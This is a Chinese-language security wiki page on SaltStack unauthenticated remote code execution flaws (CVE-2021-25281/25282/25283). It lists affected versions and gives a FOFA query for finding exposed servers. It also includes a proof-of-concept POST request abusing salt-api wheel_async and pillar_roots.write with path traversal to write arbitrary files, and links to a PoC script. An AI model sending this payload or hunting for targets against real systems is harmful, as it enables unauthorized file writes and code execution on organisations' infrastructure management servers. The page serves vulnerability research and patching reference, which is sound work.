menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right Saltstack 未授权RCE漏洞 (CVE-2021-25281-25282-25283).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Saltstack 未授权RCE漏洞 (CVE-2021-25281-25282-25283).md
    1.35 KB / 2021-05-21 09:14:38
        # Saltstack 未授权RCE漏洞 (CVE-2021-25281/25282/25283)
    
    SaltStack套件是政企机构 IT运维管理人员常用的管理工具,利用这些漏洞,最严重情形可导致未授权远程代码执行。
    
    漏洞分析见:https://mp.weixin.qq.com/s/QvQoTuQJVthxS07pbLWJmg
    
    云鼎实验室:[首发分析 | SaltStack远程执行代码多个高危漏洞透析(CVE-2021-25281/25282/25283)](https://mp.weixin.qq.com/s/iu4cS_DZTs0sVVg92RBe4Q)
    
    FOFA:
    
    ```
    app="SALTSTACK-产品"
    ```
    
    影响版本:
    
    * Saltstack 3002.2之前的所有版本
    * SaltStack =< 3002.2
    * SaltStack =< 3001.4
    * SaltStack =< 3000.6
    
    
    1. salt-api wheel_async未授权访问 (CVE-2021-25281)
    2. sdb rest插件模版渲染问题 (CVE-2021-25283)
    3. wheel/pillar_roots.py文件任意写漏洞 (CVE-2021-25282 )
    
    CVE-2021-25281 + CVE-2021-25282 PoC:
    
    ```
    http://target/run
    POST:
    "client": "wheel_async",
    "fun": "pillar_roots.write",
    "data": "../../../../../tmp/test2",
    "path": "../../../../../tmp/test2",
    "username": "password",
    "password": "username",
    "eauth": "pam"
    ```
    
    poc.py:https://github.com/Immersive-Labs-Sec/CVE-2021-25281
    
    **ref:**
    
    * https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/
    * https://twitter.com/KevTheHermit/status/1365130814430846979
    * https://github.com/Immersive-Labs-Sec/CVE-2021-25281
    * https://dozer.nz/posts/saltapi-vulns
    
    
    links
    file_download